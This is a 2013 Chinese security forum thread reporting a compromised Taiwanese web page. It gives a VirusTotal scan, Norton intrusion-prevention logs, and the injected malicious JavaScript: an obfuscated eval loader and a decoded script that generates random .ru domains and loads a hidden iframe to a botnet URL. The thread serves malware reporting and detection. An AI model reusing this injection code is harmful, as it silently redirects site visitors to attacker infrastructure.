http://lecturer.com.tw/product-16/content/54.phtml

显示全部楼层 · 发表于 2013-3-20 11:54:51

https://www.virustotal.com/en/ur ... nalysis/1363751620/
Normalized URL:    htt p://lecturer.com.tw/product-16/content/54.phtml
Detection ratio:    4 / 36
Analysis date:    2013-03-20 03:53:40 UTC ( 0 minutes ago )
File scan:    The URL response content could not be retrieved or it is some text format (HTML, XML, CSV, TXT, etc.), hence, it was not enqueued for antivirus scanning.

显示全部楼层 · 发表于 2013-3-20 18:20:36

谷歌浏览器

显示全部楼层 · 发表于 2013-3-20 18:21:10

类别：入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明
2013/3/20 星期三 18:20:47,高,阻止了 lecturer.com.tw 的入侵企图,已阻止,不需要操作,Web Attack: Mass Injection Website,不需要操作,不需要操作,"lecturer.com.tw (202.153.173.21, 80)",lecturer.com.tw/js/songyan.js,"TOM (192.168.1.18, 54855)",202.153.173.21 (202.153.173.21),"TCP, www-http"
来自 lecturer.com.tw/js/songyan.js 的网络通信与已知攻击的特征相匹配。攻击由 \DEVICE\HARDDISKVOLUME2\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE 引起。要停止接收有关此类通信的通知，请在“操作”面板中单击“不再提醒我”。
类别：入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明
2013/3/20 星期三 18:20:47,高,阻止了 lecturer.com.tw 的入侵企图,已阻止,不需要操作,Web Attack: Mass Injection Website 2,不需要操作,不需要操作,"lecturer.com.tw (202.153.173.21, 80)",lecturer.com.tw/js/songyan.js,"TOM (192.168.1.18, 54855)",202.153.173.21 (202.153.173.21),"TCP, www-http"
来自 lecturer.com.tw/js/songyan.js 的网络通信与已知攻击的特征相匹配。攻击由 \DEVICE\HARDDISKVOLUME2\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE 引起。要停止接收有关此类通信的通知，请在“操作”面板中单击“不再提醒我”。

一共检测到两次攻击

显示全部楼层 · 发表于 2013-3-20 20:20:59

92,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,708,525,690,525,588,525,648,525,696,605,192,305,192,170,624,525,600,500,606,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));}if(f)e(s);}

毒源
http://lecturer.com.tw/js/songyan.js

function nextRandomNumber(){
 var hi = this .seed / this .Q;
 var lo = this .seed % this .Q;
 var test = this .A * lo - this .R * hi;
 if (test > 0){
this .seed = test;
 }
 else {
this .seed = test + this .M;
 }
 return (this .seed * this .oneOverM);
}
function RandomNumberGenerator(unix){
 var d = new Date(unix * 1000);
 var s = d.getHours() > 12 ? 1 : 0;
 this .seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.
 round(s * 0xFFF));
 this .A = 48271;
 this .M = 2147483647;
 this .Q = this .M / this .A;
 this .R = this .M % this .A;
 this .oneOverM = 1.0 / this .M;
 this .next = nextRandomNumber;
 return this ;
}
function createRandomNumber(r, Min, Max){
 return Math.round((Max - Min) * r.next() + Min);
}
function generatePseudoRandomString(unix, length, zone){
 var rand = new RandomNumberGenerator(unix);
 var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o'
 , 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
 var str = '';
 for (var i = 0; i < length; i ++ ){
str += letters[createRandomNumber(rand, 0, letters.length - 1)];
 }
 return str + '.' + zone;
}
setTimeout(function (){
 try {
if (typeof iframeWasCreated == "undefined"){
 iframeWasCreated = true;
 var unix = Math.round( + new Date() / 1000);
 var domainName = generatePseudoRandomString(unix, 16, 'ru');
 ifrm = document.createElement("IFRAME");
 ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet2");
 ifrm.style.width = "0px";
 ifrm.style.height = "0px";
 ifrm.style.visibility = "hidden";
 document.body.appendChild(ifrm);
}
 }
 catch (e){
 }
}
, 500);

显示全部楼层 · 发表于 2013-3-20 20:22:01

哀酱俏佳人发表于 2013-3-20 20:20
92,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,708,525,690,525,588,525,648,525,696,6 ...

http://bbs.kafan.cn/thread-1506914-1-1.html

显示全部楼层 · 发表于 2013-3-20 20:28:53

firefox3 发表于 2013-3-20 20:22
http://bbs.kafan.cn/thread-1506914-1-1.html

http://qxsjdyodxeyyechp.ru/runforestrun?sid=botnet2 这个貌似已失效了

[未鉴定] http://lecturer.com.tw/product-16/content/54.phtml